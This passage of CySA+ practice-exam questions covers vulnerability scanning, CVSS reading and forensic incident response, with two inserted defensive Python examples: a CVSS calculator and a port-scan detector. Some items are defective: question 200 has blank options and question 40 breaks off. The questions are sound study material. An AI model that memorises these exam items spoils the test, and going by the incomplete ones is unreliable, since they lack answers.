187. Lori is studying vulnerability scanning as she prepares for the CySA+ exam. Which of the following is not one of the principles she should observe when preparing for the exam to avoid causing issues for her organization?
A. Run only nondangerous scans on production systems to avoid disrupting a production service.
B. Run scans in a quiet manner without alerting other IT staff to the scans or their results to minimize the impact of false information.
C. Limit the bandwidth consumed by scans to avoid overwhelming an active network link.
D. Run scans outside of periods of critical activity to avoid disrupting the business.
188. Meredith is configuring a vulnerability scan and would like to configure the scanner to perform credentialed scans. Of the menu options shown here, which will allow her to directly configure this capability?

    Manage Vulnerability Scans
    Launch new vulnerability scans, monitor the status of running scans and view the details of vulnerabilities discovered after scans complete.

    Manage Discovery Scans
    Use free discovery scans (maps) to discover live devices on your network. Discovered devices can be selected for vulnerability scanning based on the info gathered (OS, ports, etc.) in a map.

    Configure Scan Settings
    Customize the various scanning options required to run a scan. These can be saved as profiles for reuse. A default profile is provided for common environments.

    Configure Scan Schedules
    Configure scans to run automatically, or on a recurring basis and monitor results of your scans.

    Configure Scanner Appliances
    Scanner Appliances (physical or virtual) are required to scan devices on internal networks. Managers can download appliances and configure them for scanning.

    Set Up Host Authentication
    Use the authentication feature (Windows, Linux, Oracle, etc.) to discover and validate vulnerabilities by performing an in-depth assessment of your hosts.

    Configure Search Lists
    Apply custom lists of vulnerabilities to scan profiles in order to limit scanning to certain vulnerabilities only.

A. Manage Discovery Scans
B. Configure Scan Settings
C. Configure Search Lists
D. Set Up Host Authentication


189. Norman is working with his manager to implement a vulnerability management program for his company. His manager tells him that he should focus on remediating critical and high-severity risks and that the organization does not want to spend time worrying about risks rated medium or lower. What type of criteria is Norman's manager using to make this decision?
A. Risk appetite
B. False positive
C. False negative
D. Data classification


190. After running a vulnerability scan against his organization's VPN server, Chris discovered the vulnerability shown here. What type of cryptographic situation does a birthday attack leverage?

    Vulnerabilities (8)
    3  Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32)
    First Detected: 04/05/2017 at 03:14:48 (GMT-0400)   Last Detected: 04/05/2017 at 03:14:48 (GMT-0400)
    QID: 38657                           CVSS Base: 5
    Category: General remote services    CVSS Temporal: 4.3
    CVE ID: CVE-2016-2183                CVSS3 Base: 5.3
    Vendor Reference: -                  CVSS3 Temporal: 4.9
    Bugtraq ID: 92630, 95568             CVSS Environment:
    Service Modified: 04/04/2017         Asset Group: -
    User Modified: -                     Collateral Damage Potential: -
    Edited: No                           Target Distribution: -
    PCI Vuln: Yes                        Confidentiality Requirement: -
    Ticket State:                        Integrity Requirement:
                                         Availability Requirement:

A. Unsecured key
B. Meet-in-the-middle
C. Man-in-the-middle
D. Collision


191. Meredith recently ran a vulnerability scan on her organization's accounting network segment and found the vulnerability shown here on several workstations. What would be the most effective way for Meredith to resolve this vulnerability?

    5  Adobe Flash Player Remote Code Execution Vulnerability (APSB17-07)
    First Detected: 04/05/2017 at 01:00:07 (GMT-0400)   Last Detected: 04/05/2017 at 01:00:07 (GMT-0400)
    QID: 370337                                            CVSS Base: 10
    Category: Local                                        CVSS Temporal: 7.4
    CVE ID: CVE-2017-2997 CVE-2017-2998 CVE-2017-2999      CVSS3 Base: 9.8
            CVE-2017-3000 CVE-2017-3001 CVE-2017-3002      CVSS3 Temporal: 8.5
            CVE-2017-3003                                  CVSS Environment:
    Vendor Reference: APSB17-07                            Asset Group: -
    Bugtraq ID: 96860, 96866, 96862, 96861                 Collateral Damage Potential: -
    Service Modified: 03/17/2017                           Target Distribution: -
    User Modified: -                                       Confidentiality Requirement: -
    Edited: No                                             Integrity Requirement: -
    PCI Vuln: Yes                                          Availability Requirement: -
    Ticket State: Open

    THREAT:
    Cross-platform plugin plays animations, videos and sound files in .SWF format.
    These vulnerabilities that could potentially allow an attacker to take control of the affected system.
    (CVE-2017-2997, CVE-2017-2998, CVE-2017-2999, CVE-2017-3000, CVE-2017-3001, CVE-2017-3002, CVE-2017-3003)
    Affected Versions:
    Adobe Flash Player 24.0.0.221 and earlier

    IMPACT:
    Successful exploitation allows a remote, unauthenticated attacker to execute arbitrary code on a targeted system.

A. Remove Flash Player from the workstations.
B. Apply the security patches described in the Adobe bulletin.
C. Configure the network firewall to block unsolicited inbound access to these workstations.
D. Install an intrusion detection system on the network.
Questions 192 through 197 refer to the vulnerability shown here.

    Web Application SQL Backend Identification
    Severity: Medium

    Description
    At least one web application hosted on the remote web server is built on a SQL backend that Nessus was able to identify by looking at error messages.
    Leaking this kind of information may help an attacker fine-tune attacks against the application and its backend.

    Solution
    Filter out error messages.

    See Also
    http://projects.webappsec.org/Fingerprinting

    Output
    The web application appears to be based on MS SQL Server
    This information was leaked by these URLs :
    http://www. -com/

    Port             Hosts
    80 / tcp / www   www. .com

    Plugin Details
    ID: 44670
    Version: $Revision: 1.10 $
    Family: CGI abuses
    Published: 2010/02/19
    Modified: 2013/09/26

    Risk Information
    Risk Factor: Medium
    CVSS Base Score: 5.0
    CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

192. Based upon the information presented in the vulnerability report, what type of access must an attacker have to exploit this vulnerability?
A. The attacker must have physical access to the system.
B. The attacker must have logical access to the system.
C. The attacker must have access to the local network that the system is connected to.
D. The attacker can exploit this vulnerability remotely.

193. Based upon the information presented in the vulnerability report, how difficult would it be for an attacker to exploit this vulnerability?
A. Exploiting this vulnerability requires specialized conditions that would be difficult to find.
B. Exploiting this vulnerability requires somewhat specialized conditions.
C. Exploiting this vulnerability does not require any specialized conditions.
D. Exploiting this vulnerability is not possible without an administrator account.

194. Based upon the information presented in the vulnerability report, what authentication hurdles would an attacker need to clear to exploit this vulnerability?
A. Attackers would need to authenticate two or more times.
B. Attackers would need to authenticate once.
C. Attackers would not need to authenticate.
D. Attackers cannot exploit this vulnerability regardless of the number of authentications.
195. What level of confidentiality risk does this vulnerability pose to the organization?
A. There is no confidentiality impact.
B. Access to some information is possible, but the attacker does not have control over what information is compromised.
C. Access to most information is possible, but the attacker does not have control over what information is compromised.
D. All information on the system may be compromised.

196. What level of integrity risk does this vulnerability pose to the organization?
A. There is no integrity impact.
B. Modification of some information is possible, but the attacker does not have control over what information is modified.
C. Modification of most information is possible, but the attacker does not have control over what information is modified.
D. All information on the system may be modified.

197. What level of availability risk does this vulnerability pose to the organization?
A. There is no availability impact.
B. The performance of the system is degraded.
C. One or more services on the system may be stopped.
D. The system is completely shut down.
198. Dan is the vulnerability manager for his organization and is responsible for tracking vulnerability remediation. There is a critical vulnerability in a network device that Dan has handed off to the device's administrator, but it has not been resolved after repeated reminders to the engineer. What should Dan do next?
A. Threaten the engineer with disciplinary action.
B. Correct the vulnerability himself.
C. Mark the vulnerability as an exception.
D. Escalate the issue to the network administrator's manager.

199. Sara's organization has a well-managed test environment. What is the most likely issue that Sara will face when attempting to evaluate the impact of a vulnerability remediation by first deploying it in the test environment?
A. Test systems are not available for all production systems.
B. Production systems require a different type of patch than test systems.
C. Significant configuration differences exist between test and production systems.
D. Test systems are running different operating systems than production systems.
200. How many vulnerabilities listed in the report shown here are significant enough to warrant immediate remediation in a typical operating environment?

    Vulnerabilities (22)   (CVSS: - and CVSS3: - for every entry)
    Sev  Title                                                                                     Status
    3    NetBIOS Shared Folder List Available                                                      Active
    3    NFS Exported Filesystems List Vulnerability                                               Active
    3    SSL Server Has SSLv3 Enabled Vulnerability (port 443/tcp over SSL)                        Active
    3    SSL Server Has SSLv2 Enabled Vulnerability (port 443/tcp over SSL)                        Active
    3    SSL/TLS use of weak RC4 cipher (port 443/tcp over SSL)                                    Active
    2    Default Windows Administrator Account Name Present                                        Active
    2    YP/NIS RPC Services Listening on Non-Privileged Ports                                     Active
    2    NetBIOS Name Accessible                                                                   Active
    2    Hidden RPC Services                                                                       Active
    2    SSL Certificate - Improper Usage Vulnerability (port 443/tcp over SSL)                    Active
    2    SSL Certificate - Self-Signed Certificate (port 443/tcp over SSL)                         Active
    2    SSL Certificate - Subject Common Name Does Not Match Server FQDN (port 443/tcp over SSL)  Active
    2    SSL Certificate - Signature Verification Failed Vulnerability (port 443/tcp over SSL)     Active
    2    NTP Information Disclosure Vulnerability (port 123/udp)                                   Active
    1    mountd RPC Daemon Discloses Exported Directories Accessed by Remote Hosts                 Active
    1    "rquotad" RPC Service Present                                                             Active
    1    Non-Zero Padding Bytes Observed in Ethernet Packets                                       Active
    1    Presence of a Load-Balancing Device Detected (port 443/tcp over SSL)                      Active
    1    Presence of a Load-Balancing Device Detected (port 80/tcp)                                Re-Opened

A. 22
B. 14
C.
D.


201. Laura discovered an operating system vulnerability on a system on her network. After tracing the IP address, she discovered that the vulnerability is on a search appliance installed on her network. She consulted with the responsible engineer who informed her that he has no access to the underlying operating system. What is the best course of action for Laura?
A. Contact the vendor to obtain a patch.
B. Try to gain access to the underlying operating system and install the patch.
C. Mark the vulnerability as a false positive.
D. Wait 30 days and rerun the scan to see whether the vendor corrected the vulnerability.

202. Which one of the following types of data is subject to regulations in the United States that specify the minimum frequency of vulnerability scanning?
A. Driver's license numbers
B. Insurance records
C. Credit card data
D. Medical records

203. Jim is responsible for managing his organization's vulnerability scanning program. He is experiencing issues with scans aborting because the previous day's scans are still running when the scanner attempts to start the current day's scans. Which one of the following solutions is least likely to resolve Jim's issue?
A. Add a new scanner.
B. Reduce the scope of the scans.
C. Reduce the sensitivity of the scans.
D. Reduce the frequency of the scans.

204. Trevor is working with an application team on the remediation of a critical SQL injection vulnerability in a public-facing service. The team is concerned that deploying the fix will require several hours of downtime and that will block customer transactions from completing. What is the most reasonable course of action for Trevor to suggest?
A. Wait until the next scheduled maintenance window.
B. Demand that the vulnerability be remediated immediately.
C. Schedule an emergency maintenance for an off-peak time later in the day.
D. Convene a working group to assess the situation.

205. While conducting a vulnerability scan of his organization's data center, Renee discovers that the management interface for the organization's virtualization platform is exposed to the scanner. In typical operating circumstances, what is the proper exposure for this interface?
A. Internet
B. Internal networks
C. No exposure
D. Management network

206. Richard is designing a remediation procedure for vulnerabilities discovered in his organization. He would like to make sure that any vendor patches are adequately tested prior to deploying them in production. What type of environment could Richard include in his procedure that would best address this issue?
A. Sandbox
B. Honeypot
C. Honeynet
D. Production

207. Becky is scheduling vulnerability scans for her organization's data center. Which one of the following is a best practice that Becky should follow when scheduling scans?
A. Schedule scans so that they are spread evenly throughout the day.
B. Schedule scans so that they run during periods of low activity.
C. Schedule scans so that they all begin at the same time.
D. Schedule scans so that they run during periods of peak activity to simulate performance under load.
208. Given the CVSS information shown here, where would an attacker need to be positioned on the network to exploit this vulnerability?

    Risk Information
    Risk Factor: High
    CVSS Base Score: 7.5
    CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

A. The attacker must have a local administrator account on the vulnerable system.
B. The attacker must have a local account on the vulnerable system but does not necessarily require administrative access.
C. The attacker must have access to the local network.
D. The attacker may exploit this vulnerability remotely without an account on the system.
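Questions 192 through 197 and question 208 all turn on reading a CVSS v2 vector metric by metric. As an added example (not from the practice test or its scanner output), this Python decodes the two CVSS2# vectors shown in those reports into the plain-language categories the questions ask about and recomputes the base scores the scanners printed (5.0 and 7.5); the metric weights are those of the published CVSS v2 base equation.

```python
"""CVSS v2 vector decoder and base-score calculator (added example)."""
from decimal import Decimal, ROUND_HALF_UP

# Plain-language meaning of each metric value, phrased the way the exam
# questions phrase them (access required, difficulty, authentication, impact).
ACCESS_VECTOR = {
    "L": "local: the attacker needs an account on the system itself",
    "A": "adjacent network: the attacker needs access to the local network",
    "N": "network: the attacker can exploit the vulnerability remotely",
}
ACCESS_COMPLEXITY = {
    "H": "high: specialized conditions that would be difficult to find",
    "M": "medium: somewhat specialized conditions",
    "L": "low: no specialized conditions required",
}
AUTHENTICATION = {
    "M": "multiple: the attacker must authenticate two or more times",
    "S": "single: the attacker must authenticate once",
    "N": "none: no authentication required",
}
IMPACT = {
    "N": "none",
    "P": "partial: some data affected, attacker does not control which",
    "C": "complete: all data on the system affected",
}

# Numeric weights from the CVSS v2 base equation.
AV_WEIGHT = {"L": 0.395, "A": 0.646, "N": 1.0}
AC_WEIGHT = {"H": 0.35, "M": 0.61, "L": 0.71}
AU_WEIGHT = {"M": 0.45, "S": 0.56, "N": 0.704}
CIA_WEIGHT = {"N": 0.0, "P": 0.275, "C": 0.660}


def parse_vector(vector: str) -> dict:
    """Turn 'CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N' into {'AV': 'N', 'AC': 'L', ...}."""
    body = vector.split("#", 1)[1] if "#" in vector else vector
    metrics = {}
    for part in body.split("/"):
        key, _, value = part.partition(":")
        metrics[key] = value
    missing = [m for m in ("AV", "AC", "Au", "C", "I", "A") if m not in metrics]
    if missing:
        raise ValueError(f"vector is missing metrics: {missing}")
    return metrics


def describe(vector: str) -> dict:
    """Map each metric to the answer category the exam questions use."""
    m = parse_vector(vector)
    return {
        "access": ACCESS_VECTOR[m["AV"]],
        "complexity": ACCESS_COMPLEXITY[m["AC"]],
        "authentication": AUTHENTICATION[m["Au"]],
        "confidentiality": IMPACT[m["C"]],
        "integrity": IMPACT[m["I"]],
        "availability": IMPACT[m["A"]],
    }


def _round1(x: float) -> float:
    # CVSS v2 rounds to one decimal place, half up (Python's round() is half-even).
    return float(Decimal(str(x)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def base_score(vector: str) -> float:
    """BaseScore = ((0.6*Impact) + (0.4*Exploitability) - 1.5) * f(Impact)."""
    m = parse_vector(vector)
    c, i, a = (CIA_WEIGHT[m[k]] for k in ("C", "I", "A"))
    impact = 10.41 * (1 - (1 - c) * (1 - i) * (1 - a))
    exploitability = 20 * AV_WEIGHT[m["AV"]] * AC_WEIGHT[m["AC"]] * AU_WEIGHT[m["Au"]]
    f_impact = 0.0 if impact == 0 else 1.176
    return _round1(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact)


if __name__ == "__main__":
    # The two vectors shown in the practice-test reports (questions 192-197 and 208).
    for v in ("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N", "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"):
        print(v, "->", base_score(v))
        for metric, text in describe(v).items():
            print(f"  {metric}: {text}")
```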





Domain 3: Cyber Incident Response

EXAM OBJECTIVES COVERED IN THIS CHAPTER:

✓ 3.1 Given a scenario, distinguish threat data or behavior to determine the impact of an incident.
  ■ Threat classification
  ■ Factors contributing to incident severity and prioritization

✓ 3.2 Given a scenario, prepare a toolkit and use appropriate forensics tools during an investigation.
  ■ Forensics kit
  ■ Forensic investigation suite

✓ 3.3 Explain the importance of communication during the incident response process.
  ■ Stakeholders
  ■ Purpose of communication processes
  ■ Role-based responsibilities

✓ 3.4 Given a scenario, analyze common symptoms to select the best course of action to support incident response.
  ■ Common network-related symptoms
  ■ Common host-related symptoms
  ■ Common application-related symptoms

✓ 3.5 Summarize the incident recovery and post-incident response process.
  ■ Containment techniques
  ■ Eradication techniques
  ■ Validation
  ■ Corrective actions
  ■ Incident summary report
1. If Lucca wants to validate the application files he has downloaded from the vendor of his application, what information should he request from them?
A. File size and file creation date
B. MD5 hash
C. Private key and cryptographic hash
D. Public key and cryptographic hash

2. Jeff discovers multiple .jpg photos during his forensic investigation of a computer involved in an incident. When he runs exiftool to gather file metadata, which information is not likely to be part of the images even if they have complete metadata intact?
A. GPS location
B. Camera type
C. Number of copies made
D. Correct date/timestamp

3. Chris wants to run John the Ripper against a Linux system's passwords. What does he need to attempt password recovery on the system?
A. Both /etc/passwd and /etc/shadow
B. /etc/shadow
C. /etc/passwd
D. Chris cannot recover passwords; only hashes are stored.

4. Charles needs to review the permissions set on a directory structure on a Windows system he is investigating. Which Sysinternals tool will provide him with this functionality?
A. DiskView
B. AccessEnum
C. du
D. AccessChk

5. John has designed his network as shown here and places untrusted systems that want to connect to the network into the Guests network segment. What is this type of segmentation called?
A. Proactive network segmentation
B. Isolation
C. Quarantine
D. Removal

6. The organization that Alex works for classifies security-related events using NIST's standard definitions. Which classification should he use when he discovers key logging software on one of his frequent business travelers' laptops?
A. An event
B. An adverse event
C. A security incident
D. A policy violation

7. Jennifer is planning to deploy rogue access point detection capabilities for her network. If she wants to deploy the most effective detection capability she can, which of the following detection types should she deploy first?
A. Authorized MAC
B. Authorized SSID
C. Authorized channel
D. Authorized vendor
8. Dan is designing a segmented network that places systems with different levels of security requirements into different subnets with firewalls and other network security devices between them. What phase of the incident response process is Dan in?
A. Post-incident activity
B. Detection and analysis
C. Preparation
D. Containment, eradication, and recovery

9. The company that Brian works for processes credit cards and is required to be compliant with PCI-DSS. If Brian's company experiences a breach of card data, what type of disclosure will they be required to provide?
A. Notification to local law enforcement
B. Notification to their acquiring bank
C. Notification to federal law enforcement
D. Notification to Visa and MasterCard

10. Lauren wants to create a backup of Linux permissions before making changes to the Linux workstation she is attempting to remediate. What Linux tool can she use to back up the permissions of an entire directory on the system?
A. chbkup
B. getfacl
C. aclman
D. There is not a common Linux permission backup tool.

11. While working to restore systems to their original configuration after a long-term APT compromise, Charles has three options.
A. He can restore from a backup and then update patches on the system.
B. He can rebuild and patch the system using original installation media and application software using his organization's build documentation.
C. He can remove the compromised accounts and rootkit tools and then fix the issues that allowed the attackers to access the systems.
Which option should Charles choose in this scenario?
A. Option A
B. Option B
C. Option C
D. None of the above. Charles should hire a third party to assess the systems before proceeding.

12. Jessica wants to access a macOS FileVault 2-encrypted drive. Which of the following methods is not a possible means of unlocking the volume?
A. Change the FileVault key using a trusted user account.
B. Retrieve the key from memory while the volume is mounted.
C. Acquire the recovery key.
D. Extract the keys from iCloud.
13. Susan discovers the following log entries that occurred within seconds of each other in her Squert (a Sguil web interface) console. What have her network sensors most likely detected?

    22:41:09  ET POLICY Suspicious inbound to Oracle SQL port 1521   2010936  6  5.000%
    22:41:08  ET SCAN Potential VNC Scan 5800-5820                   2002910  6  2.500%
    22:41:08  ET POLICY Suspicious inbound to PostgreSQL port 5432   2010939  6  5.000%
    22:41:07  ET SCAN Potential VNC Scan 5900-5920                   2002911  6  2.500%
    22:41:07  ET POLICY Suspicious inbound to MSSQL port 1433        2010935  6  5.000%
    22:41:06  ET POLICY Suspicious inbound to mySQL port 3306        2010937  6  5.000%

A. A failed database connection from a server
B. A denial-of-service attack
C. A port scan
D. A misconfigured log source
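Question 13 rests on noticing that six alerts hit six different database and VNC ports within three seconds. As an added example (not from the practice test), this Python parses those alert lines, copied here as a constructed sample with only the time, message and signature ID, and applies the "many distinct targets in a short window" heuristic that separates a scan from a single failed connection.

```python
"""Burst-of-ports heuristic over Squert/Snort-style alert lines (added example)."""
import re
from datetime import datetime, timedelta

# Constructed sample: the six Emerging Threats alerts from question 13,
# reduced to <time> <signature message> <signature id>.
SAMPLE_ALERTS = """\
22:41:09 ET POLICY Suspicious inbound to Oracle SQL port 1521 2010936
22:41:08 ET SCAN Potential VNC Scan 5800-5820 2002910
22:41:08 ET POLICY Suspicious inbound to PostgreSQL port 5432 2010939
22:41:07 ET SCAN Potential VNC Scan 5900-5920 2002911
22:41:07 ET POLICY Suspicious inbound to MSSQL port 1433 2010935
22:41:06 ET POLICY Suspicious inbound to mySQL port 3306 2010937
"""

# <HH:MM:SS> <message> <7-digit ET signature id>
ALERT_RE = re.compile(r"^(\d\d:\d\d:\d\d)\s+(.+?)\s+(\d{7})$")
# These ET messages end with either "port 1521" or a range such as "5800-5820".
TARGET_RE = re.compile(r"(\d{1,5}(?:-\d{1,5})?)\s*$")


def parse_alerts(text):
    """Return one dict per parseable alert line: time, message, sid, target port/range."""
    events = []
    for raw in text.splitlines():
        m = ALERT_RE.match(raw.strip())
        if not m:
            continue  # skip blank lines and anything that is not an alert
        time_str, message, sid = m.groups()
        t = TARGET_RE.search(message)
        events.append({
            "time": datetime.strptime(time_str, "%H:%M:%S"),
            "message": message,
            "sid": sid,
            # Fall back to the whole message when no port/range is present.
            "target": t.group(1) if t else message,
        })
    return events


def detect_scan(events, window=timedelta(seconds=5), min_targets=4):
    """Find the time window with the most distinct targets and classify it.

    A single failed database connection touches one port; a scan sweeps many
    distinct ports within seconds, which is what this flags.
    """
    events = sorted(events, key=lambda e: e["time"])
    best_targets, best_start, best_end = set(), None, None
    for i, first in enumerate(events):
        seen = set()
        last = first
        for e in events[i:]:
            if e["time"] - first["time"] > window:
                break
            seen.add(e["target"])
            last = e
        if len(seen) > len(best_targets):
            best_targets, best_start, best_end = seen, first["time"], last["time"]
    span = (best_end - best_start).total_seconds() if best_start else 0.0
    return {
        "distinct_targets": len(best_targets),
        "targets": sorted(best_targets),
        "span_seconds": span,
        "verdict": "port scan" if len(best_targets) >= min_targets else "no scan pattern",
    }


if __name__ == "__main__":
    # Six distinct targets within 3 seconds -> "port scan"
    print(detect_scan(parse_alerts(SAMPLE_ALERTS)))
```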


14. Frank wants to log the creation of user accounts on a Windows 7 workstation. What tool should he use to enable this logging?
A. secpol.msc
B. auditpol.msc
C. regedit
D. Frank does not need to make a change; this is a default setting.


15. If Danielle wants to purge a drive, which of the following options will accomplish her goal?
A. Cryptographic erase
B. Reformat
C. Overwrite
D. Repartition

16. Cynthia wants to build scripts to detect malware beaconing behavior. Which of the following is not a typical means of identifying malware beaconing behavior on a network?
A. Persistence of the beaconing
B. Beacon protocol
C. Beaconing interval
D. Removal of known traffic

17. While performing post-rebuild validation efforts, Scott scans a server from a remote network and sees no vulnerabilities. Joanna, the administrator of the machine, runs a scan and discovers two critical vulnerabilities and five moderate issues. What is most likely causing the difference in their reports?
A. Different patch levels during the scans
B. They are scanning through a load balancer.
C. There is a firewall between the remote network and the server.
D. Scott or Joanna ran the vulnerability scan with different settings.
18. As part of his organization's cooperation in a large criminal case, Adam's forensic team has been asked to send a forensic image of a highly sensitive compromised system in RAW format to an external forensic examiner. What steps should Adam's team take prior to sending a drive containing the forensic image?
A. Encode in E01 format and provide a hash of the original file on the drive.
B. Encode in FTK format and provide a hash of the new file on the drive.
C. Encrypt the RAW file and transfer a hash and key under separate cover.
D. Decrypt the RAW file and transfer a hash under separate cover.

19. Mika wants to analyze the contents of a drive without causing any changes to the drive. What method is best suited to ensuring this?
A. Set the "read-only" jumper on the drive.
B. Use a write blocker.
C. Use a read blocker.
D. Use a forensic software package.

    Case Number:                    Item Number:
    Evidence Description:
    Collection method:
    Evidence storage method:
    How is evidence secured?
    Collected by: (Name/ID#)
    Signature of collector: ____________________

20. What type of forensic investigation-related form is shown here?
A. Chain of custody
B. Report of examination
C. Forensic discovery log
D. Policy custody release


21. Lisa is following the CompTIA process for validation after a compromise. Which of the following actions should be included in this phase?
A. Sanitization
B. Re-imaging
C. Setting permissions
D. Secure disposal

22. Eric has access to a full suite of network monitoring tools and wants to use appropriate tools to monitor network bandwidth consumption. Which of the following is not a common method of monitoring network bandwidth usage?
A. SNMP
B. Portmon
C. Packet sniffing
D. Netflow


23. James wants to determine whether other Windows systems on his network are infected with the same malware package that he has discovered on the workstation he is analyzing. He has removed the system from his network by unplugging its network cable, as required by corporate policy. He knows that the system has previously exhibited beaconing behavior and wants to use that behavior to identify other infected systems. How can he safely create a fingerprint for this beaconing without modifying the infected system?
A. Plug the system in to the network and capture the traffic quickly at the firewall using Wireshark.
B. Plug the system into an isolated switch and use a span port or tap and Wireshark to capture traffic.
C. Review the ARP cache for outbound traffic.
D. Review the Windows firewall log for traffic logs.
24. Fred is attempting to determine whether a user account is accessing other systems on
his network and uses lsof to determine what files the user account has open. What
information should he identify when faced with the following lsof output?

adminuser@demobox:~$ sudo lsof -u demo
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bash 3882 demo cwd DIR 8,1 4096 1708171 /home/osboxes
ssh 3885 demo cwd DIR 8,1 4096 1708171 /home/osboxes
ssh 3885 demo rtd DIR 8,1 4096 2 /
ssh 3885 demo txt REG 8,1 707248 799062 /usr/bin/ssh
ssh 3885 demo 3u IPv4 32292 0t0 TCP 10.0.2.6:40114->remote.host.com:ssh (ESTABLISHED)
ssh 3885 demo 4u CHR 136,17 0t0 20 /dev/pts/17
ssh 3885 demo 5u CHR 136,17 0t0 20 /dev/pts/17
ssh 3885 demo 6u CHR 136,17 0t0 20 /dev/pts/17
bash 3957 demo cwd DIR 8,1 4096 1708171 /home/osboxes
bash 3957 demo rtd DIR 8,1 4096 2 /
bash 3957 demo txt REG 8,1 1037464 655367 /bin/bash
bash 3957 demo mem REG 8,1 47600 1315424 /lib/x86_64-linux-gnu/libnss_files-2.23.so
bash 3957 demo mem REG 8,1 47648 1315434 /lib/x86_64-linux-gnu/libnss_nis-2.23.so
bash 3957 demo mem REG 8,1 93128 1315418 /lib/x86_64-linux-gnu/libnsl-2.23.so
bash 3957 demo mem REG 8,1 35688 1315420 /lib/x86_64-linux-gnu/libnss_compat-2.23.so
bash 3957 demo mem REG 8,1 10219008 793850 /usr/lib/locale/locale-archive
bash 3957 demo mem REG 8,1 1864888 1315325 /lib/x86_64-linux-gnu/libc-2.23.so
bash 3957 demo mem REG 8,1 14608 1315349 /lib/x86_64-linux-gnu/libdl-2.23.so
bash 3957 demo mem REG 8,1 167240 1315497 /lib/x86_64-linux-gnu/libtinfo.so.5.9
bash 3957 demo mem REG 8,1 162632 1315297 /lib/x86_64-linux-gnu/ld-2.23.so
bash 3957 demo mem REG 8,1 26258 1051663 /usr/lib/x86_64-linux-gnu/gconv/gconv-modules.cache
bash 3957 demo 0u CHR 136,4 0t0 7 /dev/pts/4
bash 3957 demo 1u CHR 136,4 0t0 7 /dev/pts/4
bash 3957 demo 2u CHR 136,4 0t0 7 /dev/pts/4
bash 3957 demo 255u CHR 136,4 0t0 7 /dev/pts/4

A. The user account demo is connected from remote.host.com to a local system.
B. The user demo has replaced the /bash executable with one they control.
C. The user demo has an outbound connection to remote.host.com.
D. The user demo has an inbound ssh connection and has replaced the bash binary.


25. After completing an incident response process and providing a final report to
management, what step should Casey use to identify improvements to her incident response
plan?

A. Update system documentation.
B. Conduct a lessons-learned session.
C. Review patching status and vulnerability scans.
D. Engage third-party consultants.

26. The senior management at the company that Kathleen works for is concerned about rogue
devices on the network. If Kathleen wants to identify rogue devices on her wired network,
which of the following solutions will quickly provide the most accurate information?

A. A discovery scan using a port scanner.
B. Router and switch-based MAC address reporting.
C. A physical survey.
D. Reviewing a central administration tool like SCCM.
27. While investigating a system error, Lauren runs the df command on a Linux box that she
is the administrator for. What problem and likely cause should she identify based on this
listing?

# df -h /var/
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 40G 11.2G 28.8G 28% /
/dev/sda2 3.9G 3.9G 0 100% /var

A. The var partition is full and needs to be wiped.
B. Slack space has filled up and needs to be purged.
C. The var partition is full, and logs should be checked.
D. The system is operating normally and will fix the problem after a reboot.

28. In order, which set of Linux permissions are least permissive to most permissive?

A. 777, 444, 111
B. 544, 444, 545
C. 711, 717, 117
D. 111, 734, 747

29. As Lauren prepares her organization’s security practices and policies, she wants to address
as many threat vectors as she can using an awareness program. Which of the following
threats can be most effectively dealt with via awareness?

A. Attrition
B. Impersonation
C. Improper usage
D. Web

30. Scott wants to recover user passwords for systems as part of a forensic analysis effort. If he
wants to test for the broadest range of passwords, which of the following modes should he
run John the Ripper in?

A. Single crack mode
B. Wordlist mode
C. Incremental mode
D. External mode
31. During a forensic investigation, Charles discovers that he needs to capture a virtual
machine that is part of the critical operations of his company’s website. If he cannot
suspend or shut down the machine for business reasons, what imaging process should he
follow?

A. Perform a snapshot of the system, boot it, suspend the copied version, and copy the
directory it resides in.
B. Copy the virtual disk files and then use a memory capture tool.
C. Escalate to management to get permission to suspend the system to allow a true
forensic copy.
D. Use a tool like the Volatility Framework to capture the live machine completely.

32. Mika, a computer forensic examiner, receives a PC and its peripherals that were seized as
forensic evidence during an investigation. After she signs off on the chain of custody log
and starts to prepare for her investigation, one of the first things she notes is that each
cable and port was labeled with a color-coded sticker by the on-site team. Why are the
items labeled like this?

A. To ensure chain of custody
B. To ensure correct re-assembly
C. To allow for easier documentation of acquisition
D. To tamper-proof the system

33. Laura needs to create a secure messaging capability for her incident response team. Which
of the following methods will provide her with a secure messaging tool?

A. Text messaging
B. A Jabber server with TLS enabled
C. Email with TLS enabled
D. A messaging application that uses the Signal protocol


34. While reviewing her Nagios logs, Selah discovers the error message shown here. What
should she do about this error?

[Nagios service status shown: Apache 404 Errors - Critical - 1d 6h 2m 11s - 1/1]

A. Check for evidence of a port scan.
B. Review the Apache error log.
C. Reboot the server to restore the service.
D. Restart the Apache service.


35. Alex needs to sanitize hard drives that will be leaving his organization after a lease is
over. The drives contained information that his organization classifies as sensitive data
that competitors would find valuable if they could obtain it. Which choice is the most
appropriate to ensure that data exposure does not occur during this process?

A. Clear, validate, and document.
B. Purge the drives.
C. Purge, validate, and document.
D. The drives must be destroyed to ensure no data loss.

36. Selah is preparing to collect a forensic image for a Macintosh computer. What hard drive
format is she most likely to encounter?

A. FAT32
B. MacFAT
C. HFS+
D. NTFS

37. During a forensic analysis of an employee’s computer as part of a human resources
investigation into misuse of company resources, Tim discovers a program called Eraser
installed on the PC. What should Tim expect to find as part of his investigation?

A. A wiped C: drive
B. Antiforensic activities
C. All slack space cleared
D. Temporary files and Internet history wiped

38. Jessica wants to recover deleted files from slack space and needs to identify where the files
begin and end. What is this process called?

A. Slacking
B. Data carving
C. Disk recovery
D. Header manipulation

39. Lauren is the IT manager for a small company and occasionally serves as the
organization’s information security officer. Which of the following roles should she include
as the leader of her organization’s CSIRT?

A. Her lead IT support staff technician
B. Her organization’s legal counsel
C. A third-party IR team lead
D. She should select herself.
40. During her forensic analysis of a Windows system, Cynthia accesses the registry and
checks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
What domain was the system connected to, and what was the username that
would appear at login?

Name                          Type       Data
(Default)                     REG_SZ     (value not set)
AutoAdminLogon                REG_SZ     0
